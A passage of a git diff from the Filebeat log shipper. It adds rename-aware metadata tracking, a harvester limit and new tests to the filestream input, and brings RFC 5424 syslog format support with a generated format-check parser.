X7XMePxllPibmdgONH9tvwB5nKBcWkvNp98POJG1k6TNFJkwpeiowVl7w6ZPQbgbNm1huzKjn2BXELQr8HdrXWgZiO65MA1SGd/Uzk3yiH1raQHVXNZjOckgcz/ZwClIOUUNhjGjCctVbW4oArvY5Me2ZKxZBAQEB7WF+lVZYdJSouUoE7TLwH9r/+uGTf/jNflfQMf/WIv+8r8DAAD//4YF1Hg=" } diff --git a/filebeat/input/filestream/environment_test.go b/filebeat/input/filestream/environment_test.go index 3f651834b6c..ad15c5fefc7 100644 --- a/filebeat/input/filestream/environment_test.go +++ b/filebeat/input/filestream/environment_test.go @@ -34,6 +34,7 @@ import ( v2 "github.com/elastic/beats/v7/filebeat/input/v2" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/transform/typeconv" "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/statestore" "github.com/elastic/beats/v7/libbeat/statestore/storetest" @@ -55,6 +56,7 @@ type registryEntry struct { Cursor struct { Offset int `json:"offset"` } `json:"cursor"` + Meta interface{} `json:"meta"` } func newInputTestingEnvironment(t *testing.T) *inputTestingEnvironment { @@ -176,13 +178,51 @@ func (e *inputTestingEnvironment) requireOffsetInRegistry(filename string, expec e.t.Fatalf("cannot stat file when cheking for offset: %+v", err) } - identifier, _ := newINodeDeviceIdentifier(nil) - src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: filepath}) - entry := e.getRegistryState(src.Name()) + id := getIDFromPath(filepath, fi) + entry, err := e.getRegistryState(id) + if err != nil { + e.t.Fatalf(err.Error()) + } require.Equal(e.t, expectedOffset, entry.Cursor.Offset) } +// requireMetaInRegistry checks if the expected metadata is saved to the registry. +func (e *inputTestingEnvironment) waitUntilMetaInRegistry(filename string, expectedMeta fileMeta) { + for { + filepath := e.abspath(filename) + fi, err := os.Stat(filepath) + if err != nil { + continue + } + + id := getIDFromPath(filepath, fi) + entry, err := e.getRegistryState(id) + if err != nil { + continue + } + + if entry.Meta == nil { + continue + } + + var meta fileMeta + err = typeconv.Convert(&meta, entry.Meta) + if err != nil { + e.t.Fatalf("cannot convert: %+v", err) + } + + if requireMetadataEquals(expectedMeta, meta) { + break + } + time.Sleep(10 * time.Millisecond) + } +} + +func requireMetadataEquals(one, other fileMeta) bool { + return one == other +} + func (e *inputTestingEnvironment) requireNoEntryInRegistry(filename string) { filepath := e.abspath(filename) fi, err := os.Stat(filepath) @@ -204,21 +244,30 @@ func (e *inputTestingEnvironment) requireNoEntryInRegistry(filename string) { // requireOffsetInRegistry checks if the expected offset is set for a file. func (e *inputTestingEnvironment) requireOffsetInRegistryByID(key string, expectedOffset int) { - entry := e.getRegistryState(key) + entry, err := e.getRegistryState(key) + if err != nil { + e.t.Fatalf(err.Error()) + } require.Equal(e.t, expectedOffset, entry.Cursor.Offset) } -func (e *inputTestingEnvironment) getRegistryState(key string) registryEntry { +func (e *inputTestingEnvironment) getRegistryState(key string) (registryEntry, error) { inputStore, _ := e.stateStore.Access() var entry registryEntry err := inputStore.Get(key, &entry) if err != nil { - e.t.Fatalf("error when getting expected key '%s' from store: %+v", key, err) + return registryEntry{}, fmt.Errorf("error when getting expected key '%s' from store: %+v", key, err) } - return entry + return entry, nil +} + +func getIDFromPath(filepath string, fi os.FileInfo) string { + identifier, _ := newINodeDeviceIdentifier(nil) + src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: filepath}) + return "filestream::.global::" + src.Name() } // waitUntilEventCount waits until total count events arrive to the client. diff --git a/filebeat/input/filestream/input.go b/filebeat/input/filestream/input.go index 9c23e18473a..b63f28ff7e6 100644 --- a/filebeat/input/filestream/input.go +++ b/filebeat/input/filestream/input.go @@ -298,9 +298,6 @@ func (inp *filestream) readFromSource( s.Offset = 0 case ErrClosed: log.Info("Reader was closed. Closing.") - case reader.ErrLineUnparsable: - log.Info("Skipping unparsable line in file.") - continue default: log.Errorf("Read line error: %v", err) } diff --git a/filebeat/input/filestream/input_integration_test.go b/filebeat/input/filestream/input_integration_test.go index d37917bd202..67436446cde 100644 --- a/filebeat/input/filestream/input_integration_test.go +++ b/filebeat/input/filestream/input_integration_test.go @@ -30,8 +30,6 @@ import ( "golang.org/x/text/encoding" "golang.org/x/text/encoding/unicode" "golang.org/x/text/transform" - - loginp "github.com/elastic/beats/v7/filebeat/input/filestream/internal/input-logfile" ) // test_close_renamed from test_harvester.py @@ -43,19 +41,23 @@ func TestFilestreamCloseRenamed(t *testing.T) { env := newInputTestingEnvironment(t) testlogName := "test.log" + // prospector.scanner.check_interval must be set to a bigger interval + // than close.on_state_change.check_interval to make sure + // the Harvester detects the rename first thus allowing + // the output to receive the event and then close the source file. inp := env.mustCreateInput(map[string]interface{}{ "paths": []string{env.abspath(testlogName) + "*"}, - "prospector.scanner.check_interval": "1ms", + "prospector.scanner.check_interval": "10ms", "close.on_state_change.check_interval": "1ms", "close.on_state_change.renamed": "true", }) - ctx, cancelInput := context.WithCancel(context.Background()) - env.startInput(ctx, inp) - testlines := []byte("first log line\n") env.mustWriteLinesToFile(testlogName, testlines) + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + // first event has made it successfully env.waitUntilEventCount(1) env.requireOffsetInRegistry(testlogName, len(testlines)) @@ -75,6 +77,45 @@ func TestFilestreamCloseRenamed(t *testing.T) { env.requireOffsetInRegistry(testlogName, len(newerTestlines)) } +func TestFilestreamMetadataUpdatedOnRename(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("renaming files while Filebeat is running is not supported on Windows") + } + + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName) + "*"}, + "prospector.scanner.check_interval": "1ms", + }) + + testline := []byte("log line\n") + env.mustWriteLinesToFile(testlogName, testline) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(1) + env.waitUntilMetaInRegistry(testlogName, fileMeta{Source: env.abspath(testlogName), IdentifierName: "native"}) + env.requireOffsetInRegistry(testlogName, len(testline)) + + testlogNameRenamed := "test.log.renamed" + env.mustRenameFile(testlogName, testlogNameRenamed) + + // check if the metadata is updated and cursor data stays the same + env.waitUntilMetaInRegistry(testlogNameRenamed, fileMeta{Source: env.abspath(testlogNameRenamed), IdentifierName: "native"}) + env.requireOffsetInRegistry(testlogNameRenamed, len(testline)) + + env.mustAppendLinesToFile(testlogNameRenamed, testline) + + env.waitUntilEventCount(2) + env.requireOffsetInRegistry(testlogNameRenamed, len(testline)*2) + + cancelInput() + env.waitUntilInputStops() +} + // test_close_removed from test_harvester.py func TestFilestreamCloseRemoved(t *testing.T) { env := newInputTestingEnvironment(t) @@ -87,12 +128,12 @@ func TestFilestreamCloseRemoved(t *testing.T) { "close.on_state_change.removed": "true", }) - ctx, cancelInput := context.WithCancel(context.Background()) - env.startInput(ctx, inp) - testlines := []byte("first log line\n") env.mustWriteLinesToFile(testlogName, testlines) + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + // first event has made it successfully env.waitUntilEventCount(1) @@ -110,9 +151,8 @@ func TestFilestreamCloseRemoved(t *testing.T) { cancelInput() env.waitUntilInputStops() - identifier, _ := newINodeDeviceIdentifier(nil) - src := identifier.GetSource(loginp.FSEvent{Info: fi, Op: loginp.OpCreate, NewPath: env.abspath(testlogName)}) - env.requireOffsetInRegistryByID(src.Name(), len(testlines)) + id := getIDFromPath(env.abspath(testlogName), fi) + env.requireOffsetInRegistryByID(id, len(testlines)) } // test_close_eof from test_harvester.py @@ -217,9 +257,6 @@ func TestFilestreamBOMUTF8(t *testing.T) { "paths": []string{env.abspath(testlogName)}, }) - ctx, cancelInput := context.WithCancel(context.Background()) - env.startInput(ctx, inp) - // BOM: 0xEF,0xBB,0xBF lines := append([]byte{0xEF, 0xBB, 0xBF}, []byte(`#Software: Microsoft Exchange Server #Version: 14.0.0.0 @@ -231,6 +268,9 @@ func TestFilestreamBOMUTF8(t *testing.T) { `)...) env.mustWriteLinesToFile(testlogName, lines) + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + env.waitUntilEventCount(7) cancelInput() @@ -259,9 +299,6 @@ func TestFilestreamUTF16BOMs(t *testing.T) { "encoding": name, }) - ctx, cancelInput := context.WithCancel(context.Background()) - env.startInput(ctx, inp) - line := []byte("first line\n") buf := bytes.NewBuffer(nil) writer := transform.NewWriter(buf, encoder) @@ -270,6 +307,9 @@ func TestFilestreamUTF16BOMs(t *testing.T) { env.mustWriteLinesToFile(testlogName, buf.Bytes()) + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + env.waitUntilEventCount(1) env.requireEventsReceived([]string{"first line"}) @@ -311,3 +351,169 @@ func TestFilestreamCloseTimeout(t *testing.T) { env.requireOffsetInRegistry(testlogName, len(testlines)) } + +// test_close_inactive from test_input.py +func TestFilestreamCloseAfterInterval(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "100ms", + "close.on_state_change.inactive": "2s", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_removal from test_input.py +func TestFilestreamCloseAfterIntervalRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + env.mustRemoveFile(testlogName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +func TestFilestreamCloseAfterIntervalRenamed(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_rotation_and_removal from test_input.py +func TestFilestreamCloseAfterIntervalRotatedAndRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + env.mustRemoveFile(newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_rotation_and_removal2 from test_input.py +func TestFilestreamCloseAfterIntervalRotatedAndNewRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "1ms", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + + env.waitUntilHarvesterIsDone() + + newTestlines := []byte("rotated first line\nrotated second line\nrotated third line\n") + env.mustWriteLinesToFile(testlogName, newTestlines) + + env.waitUntilEventCount(6) + + env.mustRemoveFile(newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} diff --git a/filebeat/input/filestream/internal/input-logfile/harvester.go b/filebeat/input/filestream/internal/input-logfile/harvester.go index 5f926386aa7..72d0c27e4c8 100644 --- a/filebeat/input/filestream/internal/input-logfile/harvester.go +++ b/filebeat/input/filestream/internal/input-logfile/harvester.go @@ -35,6 +35,7 @@ import ( var ( ErrHarvesterAlreadyRunning = errors.New("harvester is already running for file") + ErrHarvesterLimitReached = errors.New("harvester limit reached") ) // Harvester is the reader which collects the lines from @@ -51,11 +52,17 @@ type Harvester interface { type readerGroup struct { mu sync.Mutex + limit uint64 table map[string]context.CancelFunc } func newReaderGroup() *readerGroup { + return newReaderGroupWithLimit(0) +} + +func newReaderGroupWithLimit(limit uint64) *readerGroup { return &readerGroup{ + limit: limit, table: make(map[string]context.CancelFunc), } } @@ -70,6 +77,10 @@ func (r *readerGroup) newContext(id string, cancelation v2.Canceler) (context.Co r.mu.Lock() defer r.mu.Unlock() + if 0 < r.limit && r.limit <= uint64(len(r.table)) { + return nil, nil, ErrHarvesterLimitReached + } + if _, ok := r.table[id]; ok { return nil, nil, ErrHarvesterAlreadyRunning } @@ -118,12 +129,12 @@ type defaultHarvesterGroup struct { harvester Harvester cleanTimeout time.Duration store *store + identifier *sourceIdentifier tg unison.TaskGroup } -// Start starts the Harvester for a Source. It does not block. func (hg *defaultHarvesterGroup) Start(ctx input.Context, s Source) { - sourceName := s.Name() + sourceName := hg.identifier.ID(s) ctx.Logger = ctx.Logger.With("source", sourceName) ctx.Logger.Debug("Starting harvester for file") @@ -175,7 +186,7 @@ func (hg *defaultHarvesterGroup) Start(ctx input.Context, s Source) { // Stop stops the running Harvester for a given Source. func (hg *defaultHarvesterGroup) Stop(s Source) { hg.tg.Go(func(_ unison.Canceler) error { - hg.readers.remove(s.Name()) + hg.readers.remove(hg.identifier.ID(s)) return nil }) } diff --git a/filebeat/input/filestream/internal/input-logfile/harvester_test.go b/filebeat/input/filestream/internal/input-logfile/harvester_test.go index 6bc6f2f72e6..9425c30be4b 100644 --- a/filebeat/input/filestream/internal/input-logfile/harvester_test.go +++ b/filebeat/input/filestream/internal/input-logfile/harvester_test.go @@ -85,17 +85,27 @@ func TestReaderGroup(t *testing.T) { require.Equal(t, 1, len(rg.table)) require.Nil(t, newCtx.Err()) }) + + t.Run("assert new harvester cannot be added if limit is reached", func(t *testing.T) { + rg := newReaderGroupWithLimit(1) + require.Equal(t, 0, len(rg.table)) + ctx, cf, err := rg.newContext("test-id", context.Background()) + requireGroupSuccess(t, ctx, cf, err) + ctx, cf, err = rg.newContext("test-id", context.Background()) + requireGroupError(t, ctx, cf, err) + }) + } func TestDefaultHarvesterGroup(t *testing.T) { source := &testSource{"/path/to/test"} requireSourceAddedToBookkeeper := func(t *testing.T, hg *defaultHarvesterGroup, s Source) { - require.True(t, hg.readers.hasID(s.Name())) + require.True(t, hg.readers.hasID(hg.identifier.ID(s))) } requireSourceRemovedFromBookkeeper := func(t *testing.T, hg *defaultHarvesterGroup, s Source) { - require.False(t, hg.readers.hasID(s.Name())) + require.False(t, hg.readers.hasID(hg.identifier.ID(s))) } t.Run("assert a harvester is started in a goroutine", func(t *testing.T) { @@ -154,7 +164,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { gorountineChecker.WaitUntilIncreased(2) // error is expected as a harvester group was expected to start twice for the same source - for !hg.readers.hasID(source.Name()) { + for !hg.readers.hasID(hg.identifier.ID(source)) { } time.Sleep(3 * time.Millisecond) @@ -212,7 +222,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { hg := testDefaultHarvesterGroup(t, mockHarvester) inputCtx := input.Context{Logger: logp.L(), Cancelation: context.Background()} - r, err := lock(inputCtx, hg.store, source.Name()) + r, err := lock(inputCtx, hg.store, hg.identifier.ID(source)) if err != nil { t.Fatalf("cannot lock source") } @@ -226,7 +236,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { ok := false for !ok { // wait until harvester is added to the bookeeper - ok = hg.readers.hasID(source.Name()) + ok = hg.readers.hasID(hg.identifier.ID(source)) if ok { releaseResource(r) } @@ -248,7 +258,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { gorountineChecker := resources.NewGoroutinesChecker() defer gorountineChecker.WaitUntilOriginalCount() - r, err := lock(inputCtx, hg.store, source.Name()) + r, err := lock(inputCtx, hg.store, hg.identifier.ID(source)) if err != nil { t.Fatalf("cannot lock source") } @@ -265,11 +275,12 @@ func TestDefaultHarvesterGroup(t *testing.T) { func testDefaultHarvesterGroup(t *testing.T, mockHarvester Harvester) *defaultHarvesterGroup { return &defaultHarvesterGroup{ - readers: newReaderGroup(), - pipeline: &pipelinemock.MockPipelineConnector{}, - harvester: mockHarvester, - store: testOpenStore(t, "test", nil), - tg: unison.TaskGroup{}, + readers: newReaderGroup(), + pipeline: &pipelinemock.MockPipelineConnector{}, + harvester: mockHarvester, + store: testOpenStore(t, "test", nil), + identifier: &sourceIdentifier{"filestream::.global::", false}, + tg: unison.TaskGroup{}, } } diff --git a/filebeat/input/filestream/internal/input-logfile/input.go b/filebeat/input/filestream/internal/input-logfile/input.go index 41219c88659..dfc9a9817a0 100644 --- a/filebeat/input/filestream/internal/input-logfile/input.go +++ b/filebeat/input/filestream/internal/input-logfile/input.go @@ -36,6 +36,7 @@ type managedInput struct { prospector Prospector harvester Harvester cleanTimeout time.Duration + harvesterLimit uint64 } // Name is required to implement the v2.Input interface @@ -62,10 +63,11 @@ func (inp *managedInput) Run( hg := &defaultHarvesterGroup{ pipeline: pipeline, - readers: newReaderGroup(), + readers: newReaderGroupWithLimit(inp.harvesterLimit), cleanTimeout: inp.cleanTimeout, harvester: inp.harvester, store: groupStore, + identifier: inp.sourceIdentifier, tg: unison.TaskGroup{}, } diff --git a/filebeat/input/filestream/internal/input-logfile/manager.go b/filebeat/input/filestream/internal/input-logfile/manager.go index 8d8548e22f0..e861fe5ab95 100644 --- a/filebeat/input/filestream/internal/input-logfile/manager.go +++ b/filebeat/input/filestream/internal/input-logfile/manager.go @@ -155,9 +155,10 @@ func (cim *InputManager) Create(config *common.Config) (input.Input, error) { } settings := struct { - ID string `config:"id"` - CleanTimeout time.Duration `config:"clean_timeout"` - }{ID: "", CleanTimeout: cim.DefaultCleanTimeout} + ID string `config:"id"` + CleanTimeout time.Duration `config:"clean_timeout"` + HarvesterLimit uint64 `config:"harvester_limit"` + }{ID: "", CleanTimeout: cim.DefaultCleanTimeout, HarvesterLimit: 0} if err := config.Unpack(&settings); err != nil { return nil, err } @@ -190,6 +191,7 @@ func (cim *InputManager) Create(config *common.Config) (input.Input, error) { harvester: harvester, sourceIdentifier: sourceIdentifier, cleanTimeout: settings.CleanTimeout, + harvesterLimit: settings.HarvesterLimit, }, nil } diff --git a/filebeat/input/filestream/internal/input-logfile/store.go b/filebeat/input/filestream/internal/input-logfile/store.go index 3bd3fcdb081..6cd0028c61c 100644 --- a/filebeat/input/filestream/internal/input-logfile/store.go +++ b/filebeat/input/filestream/internal/input-logfile/store.go @@ -270,7 +270,7 @@ func (s *store) findCursorMeta(key string, to interface{}) error { // updateMetadata updates the cursor metadata in the persistent store. func (s *store) updateMetadata(key string, meta interface{}) error { - resource := s.ephemeralStore.Find(key, false) + resource := s.ephemeralStore.Find(key, true) if resource == nil { return fmt.Errorf("resource '%s' not found", key) } diff --git a/filebeat/input/filestream/prospector.go b/filebeat/input/filestream/prospector.go index 89932773648..f08e4346c74 100644 --- a/filebeat/input/filestream/prospector.go +++ b/filebeat/input/filestream/prospector.go @@ -113,6 +113,12 @@ func (p *fileProspector) Run(ctx input.Context, s loginp.StateMetadataUpdater, h case loginp.OpCreate, loginp.OpWrite: if fe.Op == loginp.OpCreate { log.Debugf("A new file %s has been found", fe.NewPath) + + err := s.UpdateMetadata(src, fileMeta{Source: fe.NewPath, IdentifierName: p.identifier.Name()}) + if err != nil { + log.Errorf("Failed to set cursor meta data of entry %s: %v", src.Name(), err) + } + } else if fe.Op == loginp.OpWrite { log.Debugf("File %s has been updated", fe.NewPath) } @@ -169,7 +175,10 @@ func (p *fileProspector) Run(ctx input.Context, s loginp.StateMetadataUpdater, h meta.IdentifierName = p.identifier.Name() } - s.UpdateMetadata(src, fileMeta{Source: src.newPath, IdentifierName: meta.IdentifierName}) + err = s.UpdateMetadata(src, fileMeta{Source: src.newPath, IdentifierName: meta.IdentifierName}) + if err != nil { + log.Errorf("Failed to update cursor meta data of entry %s: %v", src.Name(), err) + } if p.stateChangeCloser.Renamed { log.Debugf("Stopping harvester as file %s has been renamed and close.on_state_change.renamed is enabled.", src.Name()) diff --git a/filebeat/input/log/harvester.go b/filebeat/input/log/harvester.go index 6b16861f8ec..0d4e6d6b539 100644 --- a/filebeat/input/log/harvester.go +++ b/filebeat/input/log/harvester.go @@ -331,10 +331,6 @@ func (h *Harvester) Run() error { logp.Info("End of file reached: %s. Closing because close_eof is enabled.", h.state.Source) case ErrInactive: logp.Info("File is inactive: %s. Closing because close_inactive of %v reached.", h.state.Source, h.config.CloseInactive) - case reader.ErrLineUnparsable: - logp.Info("Skipping unparsable line in file: %v", h.state.Source) - //line unparsable, go to next line - continue default: logp.Err("Read line error: %v; File: %v", err, h.state.Source) } diff --git a/filebeat/input/syslog/config.go b/filebeat/input/syslog/config.go index dd2803ecc09..4df453ca626 100644 --- a/filebeat/input/syslog/config.go +++ b/filebeat/input/syslog/config.go @@ -36,13 +36,31 @@ import ( type config struct { harvester.ForwarderConfig `config:",inline"` + Format syslogFormat `config:"format"` Protocol common.ConfigNamespace `config:"protocol"` } +type syslogFormat int + +const ( + syslogFormatRFC3164 = iota + syslogFormatRFC5424 + syslogFormatAuto +) + +var ( + syslogFormats = map[string]syslogFormat{ + "rfc3164": syslogFormatRFC3164, + "rfc5424": syslogFormatRFC5424, + "auto": syslogFormatAuto, + } +) + var defaultConfig = config{ ForwarderConfig: harvester.ForwarderConfig{ Type: "syslog", }, + Format: syslogFormatRFC3164, } type syslogTCP struct { @@ -122,3 +140,12 @@ func factory( return nil, fmt.Errorf("you must choose between TCP or UDP") } } + +func (f *syslogFormat) Unpack(value string) error { + format, ok := syslogFormats[value] + if !ok { + return fmt.Errorf("invalid format '%s'", value) + } + *f = format + return nil +} diff --git a/filebeat/input/syslog/event.go b/filebeat/input/syslog/event.go index c5eccd6ea67..8d0a7738e6f 100644 --- a/filebeat/input/syslog/event.go +++ b/filebeat/input/syslog/event.go @@ -18,6 +18,7 @@ package syslog import ( + "bytes" "math" "time" ) @@ -72,8 +73,17 @@ type event struct { year int loc *time.Location sequence int + + // RFC 5424 + version int + appName string + msgID string + processID string + data EventData } +type EventData map[string]map[string]string + // newEvent() return a new event. func newEvent() *event { return &event{ @@ -86,6 +96,7 @@ func newEvent() *event { second: -1, year: time.Now().Year(), sequence: -1, + version: -1, } } @@ -198,7 +209,12 @@ func (s *event) Year() int { // SetMessage sets the message. func (s *event) SetMessage(b []byte) { - s.message = string(b) + // remove BOM + if b[0] == 0xef && b[1] == 0xbb && b[2] == 0xbf { + s.message = string(b[3:]) + } else { + s.message = string(b) + } } // Message returns the message. @@ -298,6 +314,39 @@ func (s *event) Nanosecond() int { return s.nanosecond } +// SetVersion sets the version. +func (s *event) SetVersion(version []byte) { + s.version = bytesToInt(version) +} + +func (s *event) Version() int { + return s.version +} + +func (s *event) SetAppName(appname []byte) { + s.appName = string(appname) +} + +func (s *event) AppName() string { + return s.appName +} + +func (s *event) SetMsgID(msgID []byte) { + s.msgID = string(msgID) +} + +func (s *event) MsgID() string { + return s.msgID +} + +func (s *event) SetProcID(processID []byte) { + s.processID = string(processID) +} + +func (s *event) ProcID() string { + return s.processID +} + // Timestamp return the timestamp in UTC. func (s *event) Timestamp(timezone *time.Location) time.Time { var t *time.Location @@ -319,9 +368,39 @@ func (s *event) Timestamp(timezone *time.Location) time.Time { ).UTC() } +func (s *event) IsDataEmpty() bool { + if s.data == nil { + return true + } + return len(s.data) == 0 +} + // IsValid returns true if the date and the message are present. func (s *event) IsValid() bool { - return s.day != -1 && s.hour != -1 && s.minute != -1 && s.second != -1 && s.message != "" + return s.day != -1 && s.hour != -1 && s.minute != -1 && s.second != -1 && (s.message != "" || !s.IsDataEmpty()) +} + +func (s *event) SetData(id string, key string, data []byte, start int, end int, bs []int) { + var v string + + // param value escape + // https://tools.ietf.org/html/rfc5424#section-6.3.3 + if len(bs) > 0 { + buf := bytes.NewBufferString("") + for _, i := range bs { + buf.Write(data[start:i]) + start = i + 1 + } + if start <= end { + buf.Write(data[start:end]) + } + v = buf.String() + } else { + v = string(data[start:end]) + } + if element, ok := s.data[id]; ok { + element[key] = v + } } // BytesToInt takes a variable length of bytes and assume ascii chars and convert it to int, this is diff --git a/filebeat/input/syslog/format_check.go b/filebeat/input/syslog/format_check.go new file mode 100644 index 00000000000..6a63626b4cc --- /dev/null +++ b/filebeat/input/syslog/format_check.go @@ -0,0 +1,299 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +//line parser/format_check.rl:1 +// Code generated by ragel DO NOT EDIT. +package syslog + +//line format_check.go:8 +const format_check_start int = 1 +const format_check_first_final int = 15 +const format_check_error int = 0 + +const format_check_en_main int = 1 + +//line parser/format_check.rl:9 + +func IsRFC5424Format(data []byte) bool { + var p, cs int + isRFC5424 := false + pe := len(data) + +//line format_check.go:24 + { + cs = format_check_start + } + +//line format_check.go:29 + { + if (p) == (pe) { + goto _test_eof + } + switch cs { + case 1: + goto st_case_1 + case 0: + goto st_case_0 + case 2: + goto st_case_2 + case 3: + goto st_case_3 + case 4: + goto st_case_4 + case 5: + goto st_case_5 + case 6: + goto st_case_6 + case 7: + goto st_case_7 + case 8: + goto st_case_8 + case 9: + goto st_case_9 + case 15: + goto st_case_15 + case 10: + goto st_case_10 + case 11: + goto st_case_11 + case 12: + goto st_case_12 + case 13: + goto st_case_13 + case 14: + goto st_case_14 + } + goto st_out + st_case_1: + if data[(p)] == 60 { + goto st2 + } + goto st0 + st_case_0: + st0: + cs = 0 + goto _out + st2: + if (p)++; (p) == (pe) { + goto _test_eof2 + } + st_case_2: + switch data[(p)] { + case 48: + goto st3 + case 49: + goto st12 + } + if 50 <= data[(p)] && data[(p)] <= 57 { + goto st13 + } + goto st0 + st3: + if (p)++; (p) == (pe) { + goto _test_eof3 + } + st_case_3: + if data[(p)] == 62 { + goto st4 + } + goto st0 + st4: + if (p)++; (p) == (pe) { + goto _test_eof4 + } + st_case_4: + if 49 <= data[(p)] && data[(p)] <= 57 { + goto st5 + } + goto st0 + st5: + if (p)++; (p) == (pe) { + goto _test_eof5 + } + st_case_5: + if data[(p)] == 32 { + goto st6 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st10 + } + goto st0 + st6: + if (p)++; (p) == (pe) { + goto _test_eof6 + } + st_case_6: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto tr9 + } + goto st0 + tr9: +//line parser/format_check.rl:17 + + isRFC5424 = true + + goto st7 + st7: + if (p)++; (p) == (pe) { + goto _test_eof7 + } + st_case_7: +//line format_check.go:143 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st8 + } + goto st0 + st8: + if (p)++; (p) == (pe) { + goto _test_eof8 + } + st_case_8: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st9 + } + goto st0 + st9: + if (p)++; (p) == (pe) { + goto _test_eof9 + } + st_case_9: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st15 + } + goto st0 + st15: + if (p)++; (p) == (pe) { + goto _test_eof15 + } + st_case_15: + goto 